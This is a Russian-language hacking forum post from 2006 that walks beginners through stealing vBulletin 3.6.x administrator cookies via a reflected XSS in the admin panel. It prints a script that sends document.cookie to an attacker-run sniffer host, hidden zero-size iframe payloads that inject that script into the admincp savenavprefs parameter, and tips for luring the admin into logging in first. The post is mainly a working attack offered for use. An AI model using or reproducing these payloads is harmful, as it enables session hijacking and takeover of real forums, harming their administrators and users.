Форумы Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ.

Обсуждение в разделе «Уязвимости CMS/форумов», начал(-а) ReanimatoR, 6.11.2006.

Статус темы:
Тема закрыта для ответов.
  1. ReanimatoR

    ReanimatoR Elder - Старейшина

    Регистрация:
    27.08.2006
    Сообщения:
    180
    Одобрения:
    118
    Репутация:
    30
    На данный момент я разобрал только одну пассивную хсс.
    Вот и хочу объяснить подробнее как работать.
    Один плюс. Если XSS сработала и он открыл ссылку, то мы можем залесьть в админку, так как сама ХСС находится в админке и он уже в ней... :)
    1. Создаем на своем хостинге файл js.js(пусть будет yousite1.ru/js.js), он выглядит так:

    Code:
    img=new Image();img.src="http://Yoursite2.ru/cgi/sniff.cgi?"+document.cookie;
    , где http://Yoursite2.ru/cgi/sniff.cgi? - ваш сниффер.

    2. Вставляем в любой html файл следующий код:

    Code:
    <iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
     
    Где site.ru - сайт, у который ломаем. vbulletin/admincp - =путь до админки
    Теперь даем ему линк на html страницу и ждем куки=)
    Примечание1.
    Сессия у админа,которого вы ломаете может быть и на http://www.site.ru и на http://site.ru просто(без www), поэтому логичнее сделать сразу два варианта, то есть вставлять лучше такой код:
    Code:
    <iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
    <iframe src='http://www.site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
     
    Примечание2.
    yoursite и yoursite2 могут совпадать, я просто описал, чтобы не путались....

    Примечание3.
    Лучше всего заранее убедиться, что админ зашел в админку...Это можно сделать так:
    Попросить его что-то поменять у Вас в профиле или поискать багу на сайте(кривой скин и т.д. и попросить его поменять...) Ну в общем множестве вариантов.
    Удачи в использовании.

    Разъясню:
    ----
    НАПАДЕНИЕ ОСУЩЕСТВЛЯЕТСЯ ТОЛЬКО НА АДМИНИСТРАТОРА ФОРУМА(ИЛИ ТЕХ КТО ИМЕЕТ ДОСТУП В АДМИН ПАНЕЛЬ)
    ----
    Сессия администратора должна сохраниться(это примерно минут 10-20 после последнего действия в админ панели...).

    ------------------------------------------------------------------

    Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей vBulletin].
     
    #1 ReanimatoR, 6.11.2006
    В последний раз редактировалось модератором: 2.03.2007
    Это одобряют 9 пользоветелей.
Загрузка...
Похожие темы
  1. Ответы:
    0
    Просмотры:
    1 141
  2. Ответы:
    34
    Просмотры:
    12 225
  3. Ответы:
    67
    Просмотры:
    364 546
  4. Ответы:
    5
    Просмотры:
    6 882
Статус темы:
Тема закрыта для ответов.